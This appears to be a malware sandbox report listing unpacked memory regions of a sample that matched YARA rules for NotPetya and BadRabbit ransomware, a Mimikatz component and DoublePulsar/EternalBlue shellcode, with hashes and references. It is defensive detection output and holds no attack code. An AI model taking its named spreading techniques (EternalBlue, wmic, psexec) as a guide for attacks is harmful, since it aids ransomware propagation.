            Source: 4.0.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2cf9840.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2e67860.4.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.4d890.2.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2cfb080.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.1.p2pWin.exe.37830.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2e50000.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.4c050.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.F2CD.tmp.7ff72e900000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.37830.2.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 1.2.rundll32.exe.2ce5020.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.37830.2.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.37830.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.2.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: doublepulsarxor_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: doublepulsardllinjection_petya date = 2017-06-28, author = patrick user, description = rule to hit on the xored doublepulsar dll injection shellcode, reference1 = https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html, reference2 = https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf, company = booz allen hamilton, hash = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1
            Source: 0.0.p2pWin.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_NotPetya tc_detection_name = NotPetya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
